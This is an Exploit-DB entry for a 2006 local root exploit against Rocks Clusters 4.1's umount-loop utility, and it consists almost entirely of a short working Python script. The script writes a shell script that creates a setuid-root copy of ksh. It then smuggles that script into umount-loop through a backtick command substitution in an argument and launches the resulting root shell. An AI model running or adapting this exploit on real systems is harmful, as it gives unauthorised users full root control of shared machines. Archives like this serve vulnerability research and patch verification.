Lucene search

K
exploitdbXavier de LeonEDB-ID:2015
HistoryJul 15, 2006 - 12:00 a.m.

Rocks Clusters 4.1 - 'umount-loop' Local Privilege Escalation

2006-07-1500:00:00
Xavier de Leon
www.exploit-db.com
26

AI Score

7.4

Confidence

Low

#!/usr/bin/env python
##############################################################################
##  rocksumountdirty.py: Rocks release <=4.1 local root exploit
##  quick and nasty version of the exploit. make sure the . is writable and
##  you clean up afterwards. ;)
##
##  coded by: [email protected] [http://xavsec.blogspot.com]
##############################################################################
x=__import__('os');c=x.getcwd()
open('%s/x'%c, 'a').write("#!/bin/sh\ncp /bin/ksh %s/shell\nchmod a+xs %s/shell\nchown root.root %s/shell\n" % (c,c,c))
print "Rocks Clusters <=4.1 umount-loop local root exploit by [email protected] [http://xavsec.blogspot.com]"
x.system('umount-loop "\`sh %s/x\`"'%c);x.system("%s/shell"%c)

# milw0rm.com [2006-07-15]

AI Score

7.4

Confidence

Low

Related for EDB-ID:2015